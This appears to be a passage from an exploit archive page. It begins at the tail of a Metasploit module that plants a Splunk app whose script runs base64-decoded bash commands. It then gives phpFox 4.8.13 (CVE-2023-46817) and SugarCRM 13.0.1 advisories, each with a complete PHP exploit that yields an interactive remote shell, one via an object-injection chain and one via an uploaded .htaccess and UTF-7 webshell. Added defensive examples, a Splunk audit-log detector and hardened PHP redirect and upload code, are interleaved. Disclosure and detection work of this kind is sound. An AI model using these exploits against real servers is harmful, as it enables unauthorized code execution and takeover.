fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))<br /><br /> print_good("#{app_name} successfully uploaded")<br /> end<br /><br /> # def splunk_fetch_job_output<br /> # res = send_request_cgi({<br /> # 'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),<br /> # 'method' => 'GET',<br /> # 'keep_cookies' => true,<br /> # 'cookie' => cookie,<br /> # 'vars_get' => {<br /> # 'output_mode' => 'json'<br /> # }<br /> # })<br /><br /> # fail_with(Failure::UnexpectedReply, "Unable to get JOB results. 
Unexpected reply (HTTP #{res.code})") unless res&.code == 200<br /><br /> # body = res.get_json_document<br /><br /> # fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?<br /><br /> # Rex::Text.decode_base64(body['results'].first['result'])<br /> # end<br /><br /> def splunk_app<br /> # metadata folder<br /> metadata = <<~EOF<br /> [commands]<br /> export = system<br /> EOF<br /><br /> # default folder<br /> commands_conf = <<~EOF<br /> [#{app_name}]<br /> type = python<br /> filename = #{app_name}.py<br /> local = false<br /> enableheader = false<br /> streaming = false<br /> perf_warn_limit = 0<br /> EOF<br /><br /> app_conf = <<~EOF<br /> [launcher]<br /> author=#{Faker::Name.name}<br /> description=#{Faker::Lorem.sentence}<br /> version=#{Faker::App.version}<br /><br /> [ui]<br /> is_visible = false<br /> EOF<br /><br /> # bin folder<br /> msf_exec_py = <<~EOF<br /> import sys, base64, subprocess<br /> import splunk.Intersplunk<br /><br /> header = ['result']<br /> results = []<br /><br /> try:<br /> proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)<br /> output = proc.stdout.read().decode('utf-8')<br /> results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})<br /> except Exception as e:<br /> error_msg = f'Error : {str(e)} '<br /> results = splunk.Intersplunk.generateErrorResults(error_msg)<br /><br /> splunk.Intersplunk.outputResults(results, fields=header)<br /> EOF<br /><br /> tarfile = StringIO.new<br /> Rex::Tar::Writer.new tarfile do |tar|<br /> tar.add_file("#{app_name}/metadata/default.meta", 0o644) do |io|<br /> io.write metadata<br /> end<br /> tar.add_file("#{app_name}/default/commands.conf", 0o644) do |io|<br /> io.write commands_conf<br /> end<br /> tar.add_file("#{app_name}/default/app.conf", 0o644) do |io|<br /> io.write 
app_conf<br /> end<br /> tar.add_file("#{app_name}/bin/#{app_name}.py", 0o644) do |io|<br /> io.write msf_exec_py<br /> end<br /> end<br /> tarfile.rewind<br /> tarfile.close<br /><br /> Rex::Text.gzip(tarfile.string)<br /> end<br /><br /> def cookies_hash<br /> cookie.split(';').each_with_object({}) { |name, h| h[name.split('=').first.strip] = name.split('=').last.strip }<br /> end<br /><br />end<br /></code></pre>
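A detection-side example added here, not part of the Metasploit module above: it parses constructed _audit-style events and flags the sequence the module produces, a cross-account edit_user password change, an app install by the taken-over account, and a search that pipes a base64 argument into a non-standard command. Field names beyond user, action and info, the app name and the account names are assumptions for this example.

```python
"""Detection logic for the Splunk edit_user abuse described in the module above,
run over constructed _audit-style events.  Added defensive example; not part of
the Metasploit module."""
import base64
import binascii
import re

# Constructed sample events in the Audit:[key=value, ...] layout of Splunk's audit
# log.  Field names other than user/action/info (object, operation, search,
# ui_dispatch_app) are assumptions for this example; the app name is made up.
SAMPLE_AUDIT = """\
11-13-2023 10:00:01.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:00:01.000, user=lowpriv, action=login attempt, info=succeeded]
11-13-2023 10:00:05.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:00:05.000, user=lowpriv, action=edit_user, info=granted, object=admin, operation=edit_password]
11-13-2023 10:00:09.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:00:09.000, user=admin, action=login attempt, info=succeeded]
11-13-2023 10:00:14.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:00:14.000, user=admin, action=install_app, info=granted, object=zoomoa]
11-13-2023 10:00:20.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:00:20.000, user=admin, action=search, info=granted, search='| zoomoa aWQ7IHVuYW1lIC1h', ui_dispatch_app=zoomoa]
11-13-2023 10:05:00.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:05:00.000, user=admin, action=edit_user, info=granted, object=admin, operation=edit_password]
11-13-2023 10:06:00.000 +0000 INFO AuditLogger - Audit:[timestamp=11-13-2023 10:06:00.000, user=alice, action=search, info=granted, search='search index=_internal | head 5', ui_dispatch_app=search]
"""

# Accounts expected to edit other users (assumption: only admin does that here).
USER_ADMINS = {"admin"}
# Generating commands that legitimately start a search with a leading pipe.
KNOWN_GENERATING = {"search", "inputlookup", "makeresults", "rest", "tstats",
                    "datamodel", "metadata", "dbinspect", "loadjob", "from", "mstats"}

AUDIT_BODY = re.compile(r"Audit:\[(.*)\]\s*$")
KEY_VALUE = re.compile(r"(\w+)=('[^']*'|[^,\]]*)")


def parse_audit_event(line):
    """Return the key/value fields of one Audit:[...] line, or None for other lines."""
    match = AUDIT_BODY.search(line)
    if not match:
        return None
    return {key: value.strip("'") for key, value in KEY_VALUE.findall(match.group(1))}


def looks_like_base64_command(token):
    """True if token is valid base64 that decodes to printable text, the shape the
    module uses for the command argument of its custom search command."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 4 and all(32 <= b < 127 or b in (9, 10) for b in raw)


def analyze(events):
    """Apply three rules over the event stream, in order, and return the alerts."""
    alerts = []
    taken_over = set()           # accounts whose password was set by another user
    for ev in events:
        user, action = ev.get("user"), ev.get("action")
        target = ev.get("object")
        # Rule 1: a non-administrator changed another account's password.
        if action == "edit_user" and target not in (None, user) and user not in USER_ADMINS:
            taken_over.add(target)
            alerts.append((user, "edit_user_cross_account",
                           f"{user} ran {ev.get('operation', '?')} on {target}"))
        # Rule 2: the account edited in rule 1 then installs an app (the RCE step).
        if action == "install_app" and user in taken_over:
            alerts.append((user, "post_takeover_app_install",
                           f"app {target} installed by {user}"))
        # Rule 3: a search that is only a pipe into a non-standard command with a
        # base64 argument, which is how the uploaded app is invoked.
        if action == "search":
            head = re.match(r"\|\s*(\w+)\s+(\S+)", ev.get("search", ""))
            if (head and head.group(1).lower() not in KNOWN_GENERATING
                    and looks_like_base64_command(head.group(2))):
                alerts.append((user, "custom_command_base64_arg",
                               f"{user} piped into '{head.group(1)}' with a base64 payload"))
    return alerts


def detect(log_text):
    """Convenience wrapper: parse the raw log text and return the alert list."""
    events = [ev for ev in map(parse_audit_event, log_text.splitlines()) if ev]
    return analyze(events)


if __name__ == "__main__":
    for user, rule, detail in detect(SAMPLE_AUDIT):
        print(f"[{rule}] {user}: {detail}")
```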
<pre><code>--------------------------------------------------------------<br />phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br />--------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.phpfox.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.8.13 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />User input passed through the "url" request parameter to the <br />/core/redirect route is not properly sanitized before being used in a <br />call to the unserialize() PHP function. This can be exploited by remote, <br />unauthenticated attackers to inject arbitrary PHP objects into the <br />application scope, allowing them to perform a variety of attacks, such <br />as executing arbitrary PHP code.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2023-46817.php<br /><br />(Packet Storm note: POC included at bottom)<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.8.14 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[05/10/2023] - Vendor contacted through https://clients.phpfox.com<br />[05/10/2023] - Vendor response stating "we currently do not have such <br />security requirements"<br />[06/10/2023] - CVE identifier requested<br />[09/10/2023] - Vulnerability details shared with the vendor, stating the <br />issue is quite critical<br />[17/10/2023] - Vendor contacted again, asking for an update<br />[18/10/2023] - Vendor response stating "this issue is fixed in our <br />latest version (4.8.13)", but that's not the truth<br />[26/10/2023] - Version 4.8.14 released<br />[27/10/2023] - CVE identifier assigned<br />[27/10/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-46817 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability 
discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-12<br /><br /><br />[-] Other References:<br /><br />https://docs.phpfox.com/display/FOX4MAN/phpFox+4.8.14<br /><br /><br />--- CVE-2023-46817.php poc ---<br /><br /><?php<br /><br />/*<br /> --------------------------------------------------------------<br /> phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability<br /> --------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://www.phpfox.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> User input passed through the "url" request parameter to the /core/redirect route is<br /> not properly sanitized before being used in a call to the unserialize() PHP function.<br /> This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP<br /> objects into the application scope, allowing them to perform a variety of attacks,<br /> such as executing arbitrary PHP code.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2023-12<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />print "+------------------------------------------------------------------+\n";<br />print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n";<br />print "+------------------------------------------------------------------+\n";<br /><br />if ($argc != 2) die("\nUsage: php 
$argv[0] <URL>\n\n");<br /><br />function encode($string)<br />{<br /> $string = addslashes(gzcompress($string, 9));<br /> return urlencode(strtr(base64_encode($string), '+/=', '-_,'));<br />}<br /><br />class Phpfox_Request<br />{<br /> private $_sName = "EgiX";<br /> private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;";<br />}<br /><br />class Core_Objectify<br />{<br /> private $__toString;<br /><br /> function __construct($callback)<br /> {<br /> $this->__toString = $callback;<br /> }<br />}<br /><br />print "\n[+] Launching shell on {$argv[1]}\n";<br /><br />$popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"]));<br />$popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain);<br /><br />$ch = curl_init();<br /><br />curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect");<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain));<br /><br />while(1)<br />{<br /> print "\nphpFox-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);<br /> preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n");<br />}<br /><br /></code></pre>
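<p>Added example (this is not phpFox code and not part of the advisory): what the /core/redirect handler described above would look like if the "url" request parameter were treated as a plain string and never passed to unserialize(). The allowed host list and the request handling at the bottom are assumptions for this example.</p>

```php
<?php
// Added example, not phpFox code. A redirect endpoint that accepts a "url"
// request parameter without ever handing user input to unserialize().
// ALLOWED_REDIRECT_HOSTS is a constructed allowlist for this example.

declare(strict_types=1);

const ALLOWED_REDIRECT_HOSTS = ['example.com', 'www.example.com']; // constructed

/**
 * Return the target URL when it is a plain http(s) URL on an allowed host,
 * or null otherwise. The value is treated purely as a string: no decoding,
 * no unserialize(), so no PHP object can be created from it.
 */
function safeRedirectTarget(string $url): ?string
{
    // Reject anything that is not a syntactically valid absolute URL.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($url);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    // Compare the host exactly; "example.com.evil.net" must not pass.
    if (!in_array(strtolower($parts['host']), ALLOWED_REDIRECT_HOSTS, true)) {
        return null;
    }
    // Strip CR/LF so the value can never split the Location header.
    return str_replace(["\r", "\n"], '', $url);
}

/**
 * If a serialized legacy format must still be read for compatibility, refuse
 * to instantiate any class: with allowed_classes => false every object in the
 * payload becomes __PHP_Incomplete_Class, so no __wakeup, __destruct or
 * __toString gadget (such as the Core\Objectify chain in the PoC above) can
 * run. Only a bare string is accepted back; anything else is discarded.
 */
function legacyUrlFromSerialized(string $serialized): ?string
{
    $value = @unserialize($serialized, ['allowed_classes' => false]);
    return is_string($value) ? $value : null;
}

// Minimal use inside the redirect route (constructed request handling).
$requested = (string) ($_POST['url'] ?? '');
$target = safeRedirectTarget($requested) ?? '/';
header('Location: ' . $target, true, 302);
```

<p>The first function is the actual fix: a redirect target needs nothing more than a validated string, so the deserialization path disappears entirely. The second function is only for code that cannot drop the serialized format yet; it removes the object-injection primitive but still leaves a parser exposed to untrusted input, so it should be a stopgap, not the design.</p>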
<pre><code>-------------------------------------------------------------------------------<br />SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload <br />Vulnerability<br />-------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://www.sugarcrm.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 13.0.1 and prior versions.<br />Version 12.0.3 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />When handling the "set_note_attachment" SOAP call, the application <br />allows uploading of<br />any kind of file into /upload/ directory. This one is protected by the <br />main SugarCRM<br />.htaccess file, i.e. it doesn't allow access/execution of PHP files. <br />However, this<br />behavior can be overridden if the subdirectory contains another <br />.htaccess file.<br />So, an attacker can leverage the vulnerability to firstly upload a new <br />.htaccess<br />file and then to upload the PHP code they want to execute.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/KIS-2023-11.php<br /><br />(Packet Storm note: POC included at bottom)<br /><br />[-] Solution:<br /><br />Upgrade to version 13.0.2, 12.0.4, or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[23/04/2023] - Vendor notified<br />[21/09/2023] - Fixed versions released<br />[06/10/2023] - CVE identifier requested<br />[26/10/2023] - Publication of this advisory<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has not assigned a CVE identifier for this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />https://karmainsecurity.com/KIS-2023-11<br /><br /><br />[-] Other References:<br /><br />https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/<br /><br /><br 
/>--- KIS-2023-11.php poc ---<br /><br /><br /><?php<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[+] cURL extension required!\n");<br /><br />if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");<br /><br />list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];<br /><br />print "[+] Logging in with username '{$user}' and password '{$pass}'\n";<br /><br />$ch = curl_init();<br /><br />$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br /><br />if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");<br /><br />print "[+] Creating new Notes bean (ID: .htaccess)\n";<br /><br />$note_id = ".htaccess";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");<br />curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);<br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));<br /><br />if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");<br /><br />print "[+] Creating new Notes bean (ID: sh.php)\n";<br /><br />$note_id = "sh.php";<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));<br /><br />if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");<br /><br />require_once("./lib/nusoap.php");<br />$client = new nusoap_client("{$url}soap.php", false);<br /><br />if (($err = $client->getError()))<br />{<br /> echo "\nConstructor error: $err";<br /> echo "\nDebug: " . $client->getDebug() . 
"\n";<br /> die();<br />}<br /><br />print "[+] Sending SOAP login request\n";<br /><br />$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];<br />$session = $client->call('login', $params);<br /><br />if ($session['id'] == -1) die("[+] SOAP login failed!\n");<br /><br />print "[+] Uploading .htaccess through 'set_note_attachment'\n";<br /><br />$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";<br />$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];<br /><br />$client->call("set_note_attachment", $params);<br /><br />print "[+] Uploading shell through 'set_note_attachment'\n";<br /><br />$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";<br />$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];<br /><br />$client->call("set_note_attachment", $params);<br /><br />print "[+] Launching shell\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");<br /><br />while(1)<br />{<br /> print "\nsugar-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);<br /> ($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");<br />}<br /><br /><br /></code></pre>
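<p>Added example (this is not SugarCRM's code and not part of the advisory): the upload-side checks that would have refused the two files the PoC above writes through "set_note_attachment", a dotfile named ".htaccess" and a PHP script named "sh.php". The upload directory, the extension allowlist and the function names are assumptions for this example.</p>

```php
<?php
// Added example, not SugarCRM code. A filename policy an attachment handler
// applies before writing anything into a web-reachable upload directory.
// UPLOAD_DIR and ALLOWED_EXTENSIONS are constructed values for this example.

declare(strict_types=1);

const UPLOAD_DIR = '/var/www/app/upload';                              // constructed
const ALLOWED_EXTENSIONS = ['pdf', 'png', 'jpg', 'jpeg', 'txt', 'csv']; // constructed

/**
 * Decide whether a client-supplied attachment name may be used at all.
 * Returns null when the name is acceptable, or a reason string otherwise.
 */
function rejectReason(string $name): ?string
{
    if ($name === '' || strlen($name) > 255) {
        return 'empty or too long';
    }
    // No directory components or NUL bytes: blocks "../x", "sub/x", "x\0.php".
    if (strpbrk($name, "/\\\0") !== false || $name !== basename($name)) {
        return 'path separator or NUL byte';
    }
    // Dotfiles such as .htaccess or .user.ini are configuration, never data.
    if ($name[0] === '.') {
        return 'leading dot (dotfile)';
    }
    // Judge by the LAST extension: "x.php.png" is "png", "x.png.php" is "php".
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return "extension '$ext' not in allowlist";
    }
    return null;
}

/**
 * Store the content under a server-chosen random name; the client name is
 * kept only as metadata by the caller. Even if the policy above were bypassed,
 * a random hex name with a vetted extension can never be ".htaccess" or "*.php".
 */
function storeAttachment(string $clientName, string $content): string
{
    $why = rejectReason($clientName);
    if ($why !== null) {
        throw new InvalidArgumentException("attachment refused: $why");
    }
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $storedName = bin2hex(random_bytes(16)) . '.' . $ext;
    $path = UPLOAD_DIR . '/' . $storedName;
    if (file_put_contents($path, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $storedName;
}
```

<p>The advisory's key observation is that the main .htaccess is only a default: a per-directory .htaccess in /upload/ overrides it, and the PoC uses that to re-enable PHP parsing with a UTF-7 script encoding. The application-level checks above stop the dotfile and the script from being written, and the web server should independently refuse to honour overrides there: in Apache, <code>AllowOverride None</code> on the upload directory means no uploaded .htaccess is ever read, and <code>php_admin_flag engine off</code> set in the server configuration cannot be undone by any .htaccess or php_flag directive.</p>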